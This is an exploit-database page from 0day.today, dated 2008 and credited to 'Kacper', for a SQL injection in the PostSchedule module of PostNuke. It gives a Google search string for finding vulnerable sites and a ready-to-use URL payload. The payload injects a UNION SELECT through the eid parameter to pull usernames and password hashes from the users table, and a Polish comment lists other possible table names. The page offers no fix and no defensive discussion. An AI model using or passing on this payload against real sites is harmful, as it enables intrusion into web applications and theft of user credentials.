[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PostNuke Module PostSchedule (eid) SQL Injection Vulnerability

Author
Kacper
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2917
Category
web applications
Date add
24-04-2008
Platform
unsorted
==============================================================
PostNuke Module PostSchedule (eid) SQL Injection Vulnerability
==============================================================



Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper 
google:"PostSchedule ver 1"

Vuln:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*

$Severo:
Moga byc rozne tabele np. pn_users, nuke_users itp.



#  0day.today [2024-12-25]  #